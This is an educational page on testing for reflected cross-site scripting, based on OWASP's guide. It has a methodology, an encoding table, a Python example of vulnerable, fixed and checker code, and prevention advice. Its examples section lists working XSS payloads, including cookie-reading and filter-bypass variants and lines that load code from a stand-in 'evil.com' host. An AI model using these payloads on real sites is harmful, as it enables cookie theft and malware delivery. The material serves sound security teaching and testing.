Reflected XSS occurs when an attacker injects malicious JavaScript code that the application reflects directly back into the victim's browser. This is the most common type of XSS found in the wild.

Testing Methodology

  • Determine the input vectors, including HTTP parameters, POST data, hidden form fields, and pre-defined radio or selection values.
  • Test each input with specially crafted input data to determine whether the input field is vulnerable.
  • Analyse the test results and determine whether they represent a vulnerability with a realistic impact on the page. This is done by examining the resulting HTML and searching for the test input. Once found, the tester identifies any characters that were not properly encoded or filtered out.

The key HTML entities which should be encoded or filtered out are:

Character   HTML entity   Description
>           &gt;          Greater than
<           &lt;          Less than
&           &amp;         Ampersand
'           &apos;        Single quote
"           &quot;        Double quote
\n                        New line
\r                        Carriage return
\                         Backslash
\uXXXX                    Unicode values
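The following is an added example (not part of the original page or of OWASP's guide) that puts the methodology and the table together: a hypothetical handler that mirrors the 'message' parameter the way the index.php example does, the same handler with output encoding applied, and the step-3 analysis that locates a marked probe in the response and reports which special characters came through unencoded. The marker string and handler templates are constructed for the demonstration.

```python
import html

# Characters from the table above that a reflected value must not carry into HTML
# unencoded. \n, \r, \ and \uXXXX matter inside JavaScript string contexts and are
# not covered by HTML entity encoding, so they are left out of this probe.
SPECIALS = ['<', '>', '&', '"', "'"]
# Constructed marker so every reflection of the probe can be located in the response.
MARKER = "zq9xss"
PROBE = MARKER + "".join(SPECIALS)


def render_vulnerable(message: str) -> str:
    # Hypothetical index.php-style handler: reflects the parameter verbatim into
    # both an element body and a quoted attribute value.
    return f'<p>{message}</p><input type="text" name="state" value="{message}">'


def encode_for_html(value: str) -> str:
    # html.escape covers both the element body and the quoted-attribute context.
    # The single quote becomes &#x27; rather than &apos;, which HTML 4 does not define.
    return html.escape(value, quote=True)


def render_fixed(message: str) -> str:
    safe = encode_for_html(message)
    return f'<p>{safe}</p><input type="text" name="state" value="{safe}">'


def unencoded_chars(response: str) -> list:
    """Step 3 of the methodology: find each reflection of PROBE and report which
    special characters survived literally (i.e. were neither encoded nor filtered)."""
    leaked = set()
    start = 0
    while (idx := response.find(MARKER, start)) != -1:
        pos = idx + len(MARKER)
        for ch in SPECIALS:
            encoded = encode_for_html(ch)
            if response.startswith(encoded, pos):   # check the entity first: '&' is a
                pos += len(encoded)                 # prefix of '&amp;'
            elif response.startswith(ch, pos):
                leaked.add(ch)                      # reflected raw: encoding failed here
                pos += 1
            else:
                break                               # filtered out or reflection truncated
        start = idx + len(MARKER)
    return sorted(leaked)


def is_reflected_xss_candidate(response: str) -> bool:
    # Any surviving < > " ' lets the probe break out of a tag or attribute context.
    return any(ch in unencoded_chars(response) for ch in '<>"\'')
```

Running `unencoded_chars(render_vulnerable(PROBE))` lists all five characters, while the encoded handler leaks none; the same check applied to a real response tells the tester which context (body or attribute) is exploitable and which characters the filter missed.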

Examples

Reflecting the 'message' query parameter directly into the page

http://vulnapp.com/index.php?message=<script>alert(1)</script>
http://vulnapp.com/index.php?message=<script>window.onload = function() { var AllLinks=document.getElementsByTagName("a");AllLinks[0].href = "http://evil.com/malicious.exe";}</script>

Injecting into HTML tag attribute values

<input type="text" name="state" value="INPUT_FROM_USER">

An attacker could inject the following value, which closes the value attribute and adds an event handler:

" onfocus="alert(document.cookie)

Different syntax, encoding or non-recursive filters

"><script >alert(document.cookie)</script >

"><ScRiPt>alert(document.cookie)</ScRiPt>

"%3cscript%3ealert(document.cookie)%3c/script%3e

<scr<script>ipt>alert(document.cookie)</script>

Include external scripts

<script src="http://evil.com/xss.js"></script>

Preventing reflected XSS

  1. Input sanitisation
    1. Rejecting invalid input by returning an error
    2. Filtering out invalid input
  2. Web application firewall rules to block malicious input
  3. Mechanisms embedded in modern web browsers
  4. Securing cookies to reduce the attack surface for session hijacking

References

  1. OWASP. Testing for Reflected Cross Site Scripting. https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting